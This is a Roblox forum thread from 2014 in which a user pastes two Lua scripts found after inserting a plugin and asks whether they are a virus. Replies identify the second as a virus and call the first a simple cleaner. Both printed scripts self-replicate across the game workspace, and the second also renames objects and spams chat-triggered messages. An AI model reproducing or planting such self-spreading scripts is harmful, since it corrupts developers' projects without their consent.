|
| 24 Oct 2014 10:00 PM |
After inserting a plugin I found my workspace has been spammed with 'Spencer2015' And there was scripts inside.
Here are the scripts I found: One names "Vaccine" function spread() -- created by 57rusted :p local stuff = game.Workspace:GetChildren() for i = 1, #stuff do if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then local clone = script:clone() clone.Parent = stuff[i] end end end
while true do wait(.1) spread() end
function GetAllItems(mdl) local objs = {} function Search(obj) if obj~=workspace then table.insert(objs,obj) end if #obj:GetChildren() > 0 then for i, v in ipairs(obj:GetChildren()) do Search(v) end end end Search(mdl) return objs end
for i, v in ipairs(GetAllItems(workspace)) do if v.className == "Script" then if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then v.Parent = game.Lighting --Just in case it has a removal prevention. t = Instance.new("ObjectValue") t.Name = "IsAVirus" t.Parent = v end end end
for i, v in ipairs(game.Lighting:GetChildren()) do if v:findFirstChild("IsAVirus") then --Only remove the viruses. v:remove() end end
print("Virus debugged! All clean!")
And another named ProperGrammarNeededInPhilosiphalLocation;InsertNoobHere Scripts: names={"spencer2015"} local NameCheck = false script.Parent.Name = names[math.random(1, #names)] script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]] local c = script.Parent:Clone()
function addEvent(ch) wait(math.random()) NameCheck = false for ss = 1, #names do if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then NameCheck = true end end if NameCheck == false then local cloak = c:Clone() cloak.Name = "" cloak:GetChildren()[1].Name = "" cloak.Parent = ch cloak.Name = names[math.random(1, 5)] end end
workspace.ChildAdded:connect(addEvent)
game.Players.PlayerAdded:connect(function(pl) pl.Chatted:connect(function(m) if m:sub(1, 5) == "Loop" then local m = Instance.new("Message") m.Parent = workspace m.Text = "THEY CALL ME CRAZY" wait(1) m.Text = "lOoOoOoOp" wait(0.25) m.Text = "LoOoOoOoP" wait(0.25) m.Text = "lOoOoOoOp" wait(0.25) m.Text = "LoOoOoOoP" wait(0.25) m.Text = "lOoOoOoOp" wait(0.25) m.Text = "LoOoOoOoP" wait(0.25) m.Text = "GOTTA GOTTA BE CRAZY" wait(1) m.Text = "lOoOoOoOp" wait(0.25) m.Text = "LoOoOoOoP" wait(0.25) m.Text = "lOoOoOoOp" wait(0.25) m.Text = "LoOoOoOoP" wait(0.25) m.Text = "lOoOoOoOp" wait(0.25) m.Text = "LoOoOoOoP" wait(0.25) m.Text = "GOTTA GET A LIFE (YOU)" wait(3) m:remove() end if m:sub(1, 5) == "HAX!" then local m = Instance.new("Message") m.Parent = workspace m.Text = "HAX!" wait(3) m:remove() end end) end)
while true do local s = workspace:GetChildren() for i = 1, #s do NameCheck = false for ss = 1, #names do if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then NameCheck = true end end if NameCheck == false then local cloak = c:Clone() cloak.Name = "" cloak:GetChildren()[1].Name = "" cloak.Parent = s[i] end wait(0.1) end wait(1) end
Is this a virus or a virus cleaner? Or what is it. |
|
|
| Report Abuse |
|
|
| 24 Oct 2014 10:13 PM |
| virus and uninstall the plugin its a virus |
|
|
| Report Abuse |
|
|
| 24 Oct 2014 10:16 PM |
| the first one looks like a virus cleaner but does not have a large database of virus names |
|
|
| Report Abuse |
|
| |